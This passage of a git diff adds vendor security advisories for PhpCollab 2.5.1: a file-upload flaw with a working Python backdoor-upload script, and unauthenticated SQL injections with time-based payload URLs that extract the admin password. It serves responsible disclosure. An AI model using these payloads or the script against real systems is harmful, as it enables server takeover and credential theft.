+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
+Content-Length: 252
+
+-----------------------------154934846911423734231554128137
+Content-Disposition: form-data; name="upload"; filename="backdoor.php"
+Content-Type: application/x-php
+
+<?php phpinfo(); ?>
+
+-----------------------------154934846911423734231554128137--
+```
+
+
+### Vulnerable code
+
+The vulnerable code is found in `clients/editclient.php`, line 63.
+
+```
+$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
+if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
+{
+  chmod("../logos_clients/".$id.".$extension",0666);
+  $tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
+  connectSql("$tmpquery");
+}
+```
+
+
+### Exploit code
+
+```
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import os
+import sys
+import requests
+
+if __name__ == '__main__':
+    if (len(sys.argv) != 4):
+        print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
+        sys.exit(1)
+
+    target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
+    print("[*] Trying to exploit with URL : %s..." % target)
+    backdoor = {'upload': open(sys.argv[3], 'rb')}
+    r = requests.post(target, files=backdoor)
+    extension = os.path.splitext(sys.argv[3])[1]
+    link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
+    r = requests.get(link)
+    if r.status_code == 200:
+        print("[OK] Backdoor link : %s" % link)
+    else:
+        print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
+```
+
+## Solution
+
+Update to the latest version avalaible.
+
+## Affected versions
+
+* Version <= 2.5.1
+
+## Timeline (dd/mm/yyyy)
+
+* 27/08/2016 : Initial discovery.
+* 05/10/2016 : Initial contact.
+* 11/10/2016 : GPG Key exchange.
+* 19/10/2016 : Advisory sent to vendor.
+* 13/02/2017 : First fixes.
+* 15/02/2017 : Fixes validation by Sysdream.
+* 21/02/2017 : PhpCollab ask to wait before publish.
+* 21/06/2017 : New version has been released.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas SERRA, Sysdream  (n.serra -at- sysdream -dot- com)
+
+--
+SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ 
+* Twitter: @sysdream 
\ No newline at end of file
diff --git a/platforms/php/webapps/42935.txt b/platforms/php/webapps/42935.txt
new file mode 100755
index 000000000..650358455
--- /dev/null
+++ b/platforms/php/webapps/42935.txt
@@ -0,0 +1,120 @@
+# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
+
+## Description
+
+PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
+
+## SQL injections
+
+The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
+
+**CVE ID**: CVE-2017-6089
+
+**Access Vector**: remote
+
+**Security Risk**: Critical
+
+**Vulnerability**: CWE-89
+
+**CVSS Base Score**: 10 (Critical)
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
+
+## Proof of Concept 1
+
+The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter  (it requires at least one topic):
+
+```
+http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
+
+http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
+```
+
+### Vulnerable code
+
+The vulnerable code is found in `topics/deletetopics.php`, line 9.
+
+```
+if ($action == "delete") {
+    $id = str_replace("**",",",$id);
+    $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
+    $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
+    $pieces = explode(",",$id);
+    $num = count($pieces);
+    connectSql("$tmpquery1");
+    connectSql("$tmpquery2");
+```
+
+
+## Proof of Concept 2
+
+The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):
+
+```
+http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
+```
+
+### Vulnerable code
+
+The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.
+
+```
+if ($action == "delete") {
+	$id = str_replace("**",",",$id);
+	$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
+	connectSql("$tmpquery1");
+```
+
+
+## Proof of Concept 3
+
+The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):
+
+```
+http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
+```
+
+### Vulnerable code
+
+The vulnerable code is found in `calendar/deletecalendar.php`, line 31.
+
+```
+if ($action == "delete") {
+	$id = str_replace("**",",",$id);
+	$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
+	connectSql("$tmpquery1");
+```
+
+**Notes**
+The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
+
+
+## Solution
+
+Update to the latest version avalaible.
+
+## Affected versions
+
+* Version <= 2.5.1
+
+## Timeline (dd/mm/yyyy)
+
+* 27/08/2016 : Initial discovery.
+* 05/10/2016 : Initial contact.
+* 11/10/2016 : GPG Key exchange.
+* 19/10/2016 : Advisory sent to vendor.
+* 13/02/2017 : First fixes.
+* 15/02/2017 : Fixes validation by Sysdream.
+* 21/02/2017 : PhpCollab ask to wait before publish.
+* 21/06/2017 : New version has been released.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas SERRA, Sysdream  (n.serra -at- sysdream -dot- com)
+
+-- 
+SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ 
+* Twitter: @sysdream 
\ No newline at end of file